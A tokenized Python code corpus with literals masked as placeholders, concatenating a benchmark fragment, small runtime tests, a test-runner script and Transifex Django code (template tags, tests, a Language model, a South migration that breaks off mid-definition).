IntLoc + <NUM_LIT:20> ] [ IntLoc ] = Array1Par [ IntLoc ] <EOL> IntGlob = <NUM_LIT:5> <EOL> def Func1 ( CharPar1 , CharPar2 ) : <EOL> CharLoc1 = CharPar1 <EOL> CharLoc2 = CharLoc1 <EOL> if CharLoc2 != CharPar2 : <EOL> return Ident1 <EOL> else : <EOL> return Ident2 <EOL> def Func2 ( StrParI1 , StrParI2 ) : <EOL> IntLoc = <NUM_LIT:1> <EOL> while IntLoc <= <NUM_LIT:1> : <EOL> if Func1 ( StrParI1 [ IntLoc ] , StrParI2 [ IntLoc + <NUM_LIT:1> ] ) == Ident1 : <EOL> CharLoc = '<STR_LIT:A>' <EOL> IntLoc = IntLoc + <NUM_LIT:1> <EOL> if CharLoc >= '<STR_LIT>' and CharLoc <= '<STR_LIT>' : <EOL> IntLoc = <NUM_LIT:7> <EOL> if CharLoc == '<STR_LIT:X>' : <EOL> return TRUE <EOL> else : <EOL> if StrParI1 > StrParI2 : <EOL> IntLoc = IntLoc + <NUM_LIT:7> <EOL> return TRUE <EOL> else : <EOL> return FALSE <EOL> def Func3 ( EnumParIn ) : <EOL> EnumLoc = EnumParIn <EOL> if EnumLoc == Ident3 : return TRUE <EOL> return FALSE <EOL> main ( ) </s>
<s> from runtime import * <EOL> """<STR_LIT>""" <EOL> def main ( ) : <EOL> a = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> keys = a . keys ( ) <EOL> assert ( '<STR_LIT:foo>' in keys ) <EOL> print '<STR_LIT>' <EOL> print a <EOL> for key in iter ( a ) : <EOL> print key <EOL> print a [ key ] <EOL> main ( ) </s>
<s> from runtime import * <EOL> '''<STR_LIT>''' <EOL> def main ( ) : <EOL> d = { '<STR_LIT:x>' : <NUM_LIT:1> } <EOL> a = '<STR_LIT:x>' in d <EOL> assert ( a == True ) <EOL> b = '<STR_LIT:y>' in d <EOL> assert ( b == False ) <EOL> main ( ) </s>
<s> from runtime import * <EOL> '''<STR_LIT>''' <EOL> def main ( ) : <EOL> a = range ( <NUM_LIT:10> ) <EOL> assert ( a [ <NUM_LIT:0> ] == <NUM_LIT:0> ) <EOL> assert ( a [ <NUM_LIT:1> ] == <NUM_LIT:1> ) <EOL> assert ( len ( a ) == <NUM_LIT:10> ) <EOL> b = range ( <NUM_LIT:1> , <NUM_LIT:10> ) <EOL> assert ( b [ <NUM_LIT:0> ] == <NUM_LIT:1> ) <EOL> assert ( b [ <NUM_LIT:1> ] == <NUM_LIT:2> ) <EOL> assert ( len ( b ) == <NUM_LIT:9> ) <EOL> c = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> c += <NUM_LIT:1> <EOL> assert ( c == <NUM_LIT:10> ) <EOL> d = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:10> ) : <EOL> d += <NUM_LIT:1> <EOL> assert ( d == <NUM_LIT:9> ) <EOL> e = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:8> + <NUM_LIT:2> ) : <EOL> e += <NUM_LIT:1> <EOL> assert ( e == <NUM_LIT:9> ) <EOL> main ( ) </s>
<s> import os , sys , subprocess <EOL> passed = { } <EOL> ignore = ( ) <EOL> TODO_FIX = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> files = os . listdir ( '<STR_LIT>' ) <EOL> files . reverse ( ) <EOL> for md in files : <EOL> if md in TODO_FIX : <EOL> print '<STR_LIT>' % md <EOL> continue <EOL> elif not md . endswith ( '<STR_LIT>' ) : <EOL> continue <EOL> print md <EOL> if md . startswith ( ignore ) : <EOL> continue <EOL> subprocess . check_call ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> os . path . join ( '<STR_LIT>' , md ) <EOL> ] ) <EOL> passed [ md ] = open ( '<STR_LIT>' ) . read ( ) . split ( '<STR_LIT>' ) [ - <NUM_LIT:1> ] <EOL> print '<STR_LIT>' <EOL> report = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> for md in passed : <EOL> print md <EOL> report . append ( '<STR_LIT>' % ( md , md ) ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . extend ( open ( '<STR_LIT>' + md , '<STR_LIT:rb>' ) . read ( ) . splitlines ( ) ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . append ( '<STR_LIT>' ) <EOL> report . extend ( passed [ md ] . splitlines ( ) ) <EOL> report . append ( '<STR_LIT>' ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:wb>' ) . write ( '<STR_LIT:\n>' . join ( report ) ) </s>
<s> from django import template <EOL> from actionlog . models import LogEntry <EOL> register = template . Library ( ) <EOL> class LogNode ( template . Node ) : <EOL> def __init__ ( self , limit , varname , user = None , object = None , log_type = '<STR_LIT>' ) : <EOL> self . limit , self . varname , self . object , self . user = ( limit , varname , <EOL> object , user ) <EOL> self . log_type = log_type <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def render ( self , context ) : <EOL> if self . user is not None : <EOL> user = template . Variable ( self . user ) . resolve ( context ) <EOL> if self . log_type and self . log_type == '<STR_LIT>' : <EOL> query = LogEntry . objects . by_user_and_public_projects ( user ) <EOL> else : <EOL> query = LogEntry . objects . by_user ( user ) <EOL> elif self . object is not None : <EOL> obj = template . Variable ( self . object ) . resolve ( context ) <EOL> query = LogEntry . objects . by_object ( obj ) <EOL> context [ self . varname ] = query [ : self . limit ] <EOL> return '<STR_LIT>' <EOL> class DoGetLog : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag_name ) : <EOL> self . tag_name = tag_name <EOL> def __call__ ( self , parser , token ) : <EOL> tokens = token . contents . split ( ) <EOL> if len ( tokens ) < <NUM_LIT:4> : <EOL> raise template . TemplateSyntaxError , ( <EOL> "<STR_LIT>" % self . tag_name ) <EOL> if not tokens [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> raise template . TemplateSyntaxError , ( <EOL> "<STR_LIT>" % self . tag_name ) <EOL> if tokens [ <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , ( <EOL> "<STR_LIT>" % self . tag_name ) <EOL> if len ( tokens ) > <NUM_LIT:4> : <EOL> if tokens [ <NUM_LIT:4> ] == '<STR_LIT>' : <EOL> return LogNode ( limit = tokens [ <NUM_LIT:1> ] , varname = tokens [ <NUM_LIT:3> ] , <EOL> user = ( len ( tokens ) > <NUM_LIT:5> and tokens [ <NUM_LIT:5> ] or None ) , <EOL> log_type = self . 
tag_name ) <EOL> elif tokens [ <NUM_LIT:4> ] == '<STR_LIT>' : <EOL> return LogNode ( limit = tokens [ <NUM_LIT:1> ] , varname = tokens [ <NUM_LIT:3> ] , <EOL> object = ( len ( tokens ) > <NUM_LIT:5> and tokens [ <NUM_LIT:5> ] or None ) , <EOL> log_type = self . tag_name ) <EOL> else : <EOL> raise template . TemplateSyntaxError , ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % self . tag_name ) <EOL> register . tag ( '<STR_LIT>' , DoGetLog ( '<STR_LIT>' ) ) <EOL> register . tag ( '<STR_LIT>' , DoGetLog ( '<STR_LIT>' ) ) </s>
<s> from django . test import TestCase <EOL> from datastores import TxRedisMapper <EOL> from transifex . txcommon . log import logger <EOL> class TestRedis ( TestCase ) : <EOL> def setUp ( self ) : <EOL> logger . critical ( "<STR_LIT>" ) <EOL> self . r = TxRedisMapper ( db = <NUM_LIT:1> ) <EOL> def tearDown ( self ) : <EOL> self . r . flushdb ( ) <EOL> def test_json_suffix ( self ) : <EOL> key = '<STR_LIT:key>' <EOL> data = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:code>' : '<STR_LIT>' } <EOL> res = self . r . lpush ( key , data = data ) <EOL> self . assertEquals ( res , <NUM_LIT:1> ) <EOL> res = self . r . lpop ( key ) <EOL> self . assertEquals ( res , data ) </s>
<s> from django . conf import settings <EOL> from django . db . models import get_model <EOL> from django . template import Library <EOL> from django . contrib . auth . models import AnonymousUser <EOL> Lock = get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> register = Library ( ) <EOL> @ register . inclusion_tag ( '<STR_LIT>' , takes_context = True ) <EOL> def lock_resource_action ( context , resource , language ) : <EOL> """<STR_LIT>""" <EOL> request = context [ '<STR_LIT>' ] <EOL> user = request . user <EOL> lock = Lock . objects . get_or_none ( resource , language ) <EOL> if request . user in ( None , AnonymousUser ( ) ) : <EOL> context [ '<STR_LIT>' ] = False <EOL> else : <EOL> context [ '<STR_LIT>' ] = Lock . can_lock ( resource , language , user ) <EOL> if lock : <EOL> if not lock . valid ( ) : <EOL> lock . delete ( ) <EOL> context [ '<STR_LIT>' ] = False <EOL> else : <EOL> context [ '<STR_LIT>' ] = lock <EOL> context [ '<STR_LIT>' ] = lock . can_unlock ( user ) <EOL> context [ '<STR_LIT>' ] = True <EOL> context [ '<STR_LIT>' ] = ( lock . owner == user ) <EOL> else : <EOL> context [ '<STR_LIT>' ] = False <EOL> context [ '<STR_LIT>' ] = resource <EOL> context [ '<STR_LIT>' ] = language <EOL> context [ '<STR_LIT>' ] = settings . LOCKS_LIFETIME / <NUM_LIT> <EOL> context [ '<STR_LIT>' ] = '<STR_LIT>' % ( resource . id , language . id ) <EOL> context [ '<STR_LIT>' ] = request . META . get ( '<STR_LIT>' , None ) or '<STR_LIT:/>' <EOL> return context </s>
<s> from django . conf . urls . defaults import * <EOL> from views import project_toggle_watch , resource_translation_toggle_watch <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( <EOL> regex = '<STR_LIT>' , <EOL> view = project_toggle_watch , <EOL> name = '<STR_LIT>' , ) , <EOL> url ( <EOL> regex = '<STR_LIT>' , <EOL> view = resource_translation_toggle_watch , <EOL> name = '<STR_LIT>' , ) , <EOL> ) </s>
<s> from datetime import datetime <EOL> from django . contrib import admin <EOL> from django . db import models <EOL> from django . db . models import permalink , get_model <EOL> from django . core . cache import cache <EOL> from django . http import Http404 <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . contrib . contenttypes import generic <EOL> class LanguageManager ( models . Manager ) : <EOL> def by_code_or_alias ( self , code ) : <EOL> """<STR_LIT>""" <EOL> if not code : <EOL> raise Language . DoesNotExist ( "<STR_LIT>" ) <EOL> lang = cache . get ( '<STR_LIT>' % code , None ) <EOL> if lang is None : <EOL> lang = Language . objects . get ( <EOL> models . Q ( code = code ) | <EOL> models . Q ( code_aliases__contains = '<STR_LIT>' % code ) <EOL> ) <EOL> cache . set ( '<STR_LIT>' % code , lang ) <EOL> return lang <EOL> def by_code_or_alias_or_none ( self , code ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . by_code_or_alias ( code ) <EOL> except Language . DoesNotExist : <EOL> return None <EOL> def by_code_or_alias_or_404 ( self , code ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . by_code_or_alias ( code ) <EOL> except Language . DoesNotExist : <EOL> raise Http404 <EOL> class Language ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> nplural_choices = ( ( <NUM_LIT:0> , u'<STR_LIT>' ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) , ( <NUM_LIT:4> , <NUM_LIT:4> ) , ( <NUM_LIT:5> , <NUM_LIT:5> ) , ( <NUM_LIT:6> , <NUM_LIT:6> ) ) <EOL> name = models . CharField ( _ ( '<STR_LIT:Name>' ) , unique = True , max_length = <NUM_LIT:50> , <EOL> help_text = "<STR_LIT>" ) <EOL> description = models . CharField ( _ ( '<STR_LIT>' ) , blank = True , max_length = <NUM_LIT:255> ) <EOL> code = models . 
CharField ( _ ( '<STR_LIT>' ) , unique = True , max_length = <NUM_LIT:50> , <EOL> help_text = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> code_aliases = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:100> , <EOL> help_text = ( "<STR_LIT>" ) , <EOL> null = True , blank = True , default = '<STR_LIT>' ) <EOL> specialchars = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> blank = True ) <EOL> nplurals = models . SmallIntegerField ( _ ( "<STR_LIT>" ) , default = <NUM_LIT:0> , <EOL> choices = nplural_choices ) <EOL> pluralequation = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True ) <EOL> rule_zero = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True , null = True ) <EOL> rule_one = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True , null = True ) <EOL> rule_two = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True , null = True ) <EOL> rule_few = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True , null = True ) <EOL> rule_many = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = True , null = True ) <EOL> rule_other = models . CharField ( _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:255> , <EOL> blank = False , null = False , default = "<STR_LIT>" ) <EOL> objects = LanguageManager ( ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . name , self . code ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> db_table = '<STR_LIT>' <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> if not self . code_aliases . startswith ( '<STR_LIT:U+0020>' ) : <EOL> self . code_aliases = '<STR_LIT>' % self . code_aliases <EOL> if not self . code_aliases . 
endswith ( '<STR_LIT:U+0020>' ) : <EOL> self . code_aliases = '<STR_LIT>' % self . code_aliases <EOL> super ( Language , self ) . save ( * args , ** kwargs ) <EOL> def get_rule_name_from_num ( self , num ) : <EOL> if num == <NUM_LIT:0> : <EOL> return '<STR_LIT>' <EOL> elif num == <NUM_LIT:1> : <EOL> return '<STR_LIT>' <EOL> elif num == <NUM_LIT:2> : <EOL> return '<STR_LIT>' <EOL> elif num == <NUM_LIT:3> : <EOL> return '<STR_LIT>' <EOL> elif num == <NUM_LIT:4> : <EOL> return '<STR_LIT>' <EOL> elif num == <NUM_LIT:5> : <EOL> return '<STR_LIT>' <EOL> def get_rule_num_from_name ( self , name ) : <EOL> if name == '<STR_LIT>' : <EOL> return <NUM_LIT:0> <EOL> elif name == '<STR_LIT>' : <EOL> return <NUM_LIT:1> <EOL> elif name == '<STR_LIT>' : <EOL> return <NUM_LIT:2> <EOL> elif name == '<STR_LIT>' : <EOL> return <NUM_LIT:3> <EOL> elif name == '<STR_LIT>' : <EOL> return <NUM_LIT:4> <EOL> elif name == '<STR_LIT>' : <EOL> return <NUM_LIT:5> <EOL> def get_pluralrules ( self ) : <EOL> rules = [ ] <EOL> if self . rule_zero : <EOL> rules . append ( '<STR_LIT>' ) <EOL> if self . rule_one : <EOL> rules . append ( '<STR_LIT>' ) <EOL> if self . rule_two : <EOL> rules . append ( '<STR_LIT>' ) <EOL> if self . rule_few : <EOL> rules . append ( '<STR_LIT>' ) <EOL> if self . rule_many : <EOL> rules . append ( '<STR_LIT>' ) <EOL> rules . append ( '<STR_LIT>' ) <EOL> return rules <EOL> def get_pluralrules_numbers ( self ) : <EOL> rules = [ ] <EOL> if self . rule_zero : <EOL> rules . append ( <NUM_LIT:0> ) <EOL> if self . rule_one : <EOL> rules . append ( <NUM_LIT:1> ) <EOL> if self . rule_two : <EOL> rules . append ( <NUM_LIT:2> ) <EOL> if self . rule_few : <EOL> rules . append ( <NUM_LIT:3> ) <EOL> if self . rule_many : <EOL> rules . append ( <NUM_LIT:4> ) <EOL> rules . append ( <NUM_LIT:5> ) <EOL> return rules </s>
<s> from django . core . urlresolvers import reverse <EOL> from transifex . txcommon . tests import base , utils <EOL> from transifex . projects . models import Project <EOL> class ProjectViewsTests ( base . BaseTestCase , base . NoticeTypes ) : <EOL> def setUp ( self , * args , ** kwargs ) : <EOL> super ( ProjectViewsTests , self ) . setUp ( * args , ** kwargs ) <EOL> self . url_acc = reverse ( '<STR_LIT>' , args = [ self . project . slug ] ) <EOL> def test_project_outsource_good ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . client [ '<STR_LIT>' ] . get ( self . url_acc , { } ) <EOL> self . assertContains ( resp , "<STR_LIT>" , status_code = <NUM_LIT:200> ) <EOL> self . assertContains ( resp , "<STR_LIT>" , status_code = <NUM_LIT:200> ) <EOL> def test_project_outsource_bad ( self ) : <EOL> self . assertTrue ( self . user [ '<STR_LIT>' ] not in self . project_private . maintainers . all ( ) ) <EOL> self . project . maintainers . add ( self . user [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( self . user [ '<STR_LIT>' ] in self . project . maintainers . all ( ) ) <EOL> resp = self . client [ '<STR_LIT>' ] . get ( self . url_acc , { } ) <EOL> self . assertContains ( resp , "<STR_LIT>" , status_code = <NUM_LIT:200> ) <EOL> self . assertNotContains ( resp , "<STR_LIT>" , status_code = <NUM_LIT:200> ) <EOL> resp = self . client [ '<STR_LIT>' ] . post ( self . url_acc , { <EOL> '<STR_LIT>' : self . project_private . id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , } ) <EOL> self . assertFalse ( self . project . outsource ) <EOL> self . assertTemplateUsed ( resp , "<STR_LIT>" ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> def test_trans_instructions ( self ) : <EOL> """<STR_LIT>""" <EOL> self . project . trans_instructions = "<STR_LIT>" "<STR_LIT>" <EOL> self . project . save ( ) <EOL> resp = self . client [ '<STR_LIT>' ] . get ( self . urls [ '<STR_LIT>' ] ) <EOL> self . 
assertContains ( resp , "<STR_LIT>" ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> def test_delete_project ( self ) : <EOL> url = reverse ( '<STR_LIT>' , args = [ self . project . slug ] ) <EOL> resp = self . client [ '<STR_LIT>' ] . get ( url ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> user = self . user [ '<STR_LIT>' ] <EOL> resp = self . client [ '<STR_LIT>' ] . post ( url , { '<STR_LIT:password>' : base . PASSWORD } , follow = True ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> self . assertTrue ( Project . objects . filter ( slug = self . project . slug ) . count ( ) == <NUM_LIT:0> ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> def test_project_edit ( self ) : <EOL> resp = self . client [ '<STR_LIT>' ] . get ( self . urls [ '<STR_LIT>' ] ) <EOL> self . assertContains ( resp , "<STR_LIT>" , status_code = <NUM_LIT:200> ) <EOL> self . assertContains ( resp , self . project . maintainers . all ( ) [ <NUM_LIT:0> ] ) <EOL> self . assertNotContains ( resp , "<STR_LIT>" ) <EOL> DATA = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' % self . user [ '<STR_LIT>' ] . id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> resp = self . client [ '<STR_LIT>' ] . post ( self . urls [ '<STR_LIT>' ] , DATA , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) </s>
<s> """<STR_LIT>""" <EOL> class FormatError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> depends_on = ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ) <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:50> , db_index = True ) ) , <EOL> ( '<STR_LIT:name>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:20> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now_add = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , null = True , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:string>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:32> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . 
gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:1000> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:100> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:1000> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = False ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now_add = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:string>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:32> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:5> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now_add = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) , <EOL> ( '<STR_LIT:user>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . 
create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:content>' , self . gf ( '<STR_LIT>' ) ( null = False , blank = False ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , unique = True , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , 